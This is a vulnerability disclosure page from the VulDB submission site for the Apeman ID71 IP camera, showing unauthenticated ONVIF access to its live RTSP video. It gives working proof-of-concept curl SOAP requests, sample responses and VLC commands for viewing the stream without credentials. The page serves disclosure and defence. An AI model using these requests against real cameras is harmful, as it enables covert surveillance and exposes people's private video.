Soumettre #668899: Apeman IP CAMERA Model ID71 sysversion: 218.53.203.117 Unauthenticated RTSP Streaminformation

TitreApeman IP CAMERA Model ID71 sysversion: 218.53.203.117 Unauthenticated RTSP Stream
DescriptionThe device exposes an ONVIF service on port 10080. ONVIF (Open Network Video Interface Forum) is a common SOAP-based API for discovering and controlling IP cameras (profiles, stream URIs, PTZ, etc.). Because the ONVIF endpoints on this device do not require authentication, an attacker on the same network can enumerate media profiles and retrieve the RTSP URI for live video — then connect directly to the camera stream (no credentials needed). How we discovered the stream (commands & output) Query ONVIF for profiles (same pattern you used): curl -s -X POST http://192.168.1.151:10080/onvif/device_service \ -H 'Content-Type: application/soap+xml; charset=utf-8' \ -H 'SOAPAction: "http://www.onvif.org/ver10/media/wsdl/GetProfiles"' \ -d ' <soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsdl="http://www.onvif.org/ver10/media/wsdl"> <soap:Header/> <soap:Body> <wsdl:GetProfiles/> </soap:Body> </soap:Envelope> ' | xmllint --format - Sample (abridged) response shows available profile tokens: <trt:GetProfilesResponse> <trt:Profiles fixed="true" token="PROFILE_000"> <tt:Name>PROFILE_000</tt:Name> <tt:VideoSourceConfiguration token="V_SRC_000"> ... Request the stream URI for the profile token: curl -s -X POST http://192.168.1.151:10080/onvif/device_service \ -H 'Content-Type: application/soap+xml; charset=utf-8' \ -H 'SOAPAction: "http://www.onvif.org/ver10/media/wsdl/GetStreamUri"' \ -d ' <soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsdl="http://www.onvif.org/ver10/media/wsdl"> <soap:Header/> <soap:Body> <wsdl:GetStreamUri> <wsdl:ProfileToken>PROFILE_000</wsdl:ProfileToken> </wsdl:GetStreamUri> </soap:Body> </soap:Envelope> ' | xmllint --format - Sample response (abridged): <trt:GetStreamUriResponse> <trt:MediaUri> <tt:Uri>rtsp://192.168.1.151:10554/udp/av0_0</tt:Uri> <tt:InvalidAfterConnect>false</tt:InvalidAfterConnect> <tt:Timeout>PT60S</tt:Timeout> </trt:MediaUri> </trt:GetStreamUriResponse> Connect to the stream (no credentials required): # UDP vlc rtsp://192.168.1.151:10554/udp/av0_0 # TCP vlc rtsp://192.168.1.151:10554/tcp/av0_0 If successful, the attacker sees the live camera video feed. Why this is a vulnerability - Unauthenticated disclosure of live video: ONVIF endpoints return RTSP URIs without requiring authentication; RTSP stream access is therefore open to anyone who can reach the device. - Sensitive exposure: Video streams can contain PII, facility layouts, worker activity, physical access events, or other sensitive surveillance content. - Ease of exploitation: Exploitation requires only network access and simple SOAP requests; no special tooling or credentials are needed. Impact - Confidentiality: High — live video and recorded streams may reveal sensitive personal or business information (people, processes, secure areas). - Integrity: Low–Medium — while reading the stream is the primary issue, some ONVIF implementations also allow PTZ control or configuration via unauthenticated endpoints, which could let an attacker reposition cameras or alter recordings. - Availability: Low — an attacker could attempt to flood the stream or change settings, but availability impact is typically limited compared to confidentiality. - Exploitability: High — trivial SOAP POSTs and an RTSP client are sufficient when the device is reachable. Vendor status: The vendor APEMAN no longer sells this camera model. It appears to have been discontinued or rebranded. Attempts to contact the vendor were unsuccessful. From my research, it seems that Apeman no longer sells or officially supports security cameras, including the Model ID71. Their current official website (https://apemans.com) focuses exclusively on projectors and dashcams, with no mention of their legacy IP camera line. Because of this, there is no longer an active vendor website or support portal that references the ID71 camera. Historical product information is only available through third-party sources (e.g., archived sales pages, second-hand listings, and user forums).
La source⚠️ https://github.com/juliourena/APEMAN-Camera-PoCs/blob/main/RTSP/RTSP_Unauthenticated.md
Utilisateur
 juliourena (UID 90207)
Soumission04/10/2025 19:00 (il y a 8 mois)
Modérer16/10/2025 13:29 (12 days later)
StatutAccepté
Entrée VulDB328798 [Apeman ID71 218.53.203.117 ONVIF Service /onvif/device_service authentification faible]
Points20

PrécédentAperçuSuivant

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!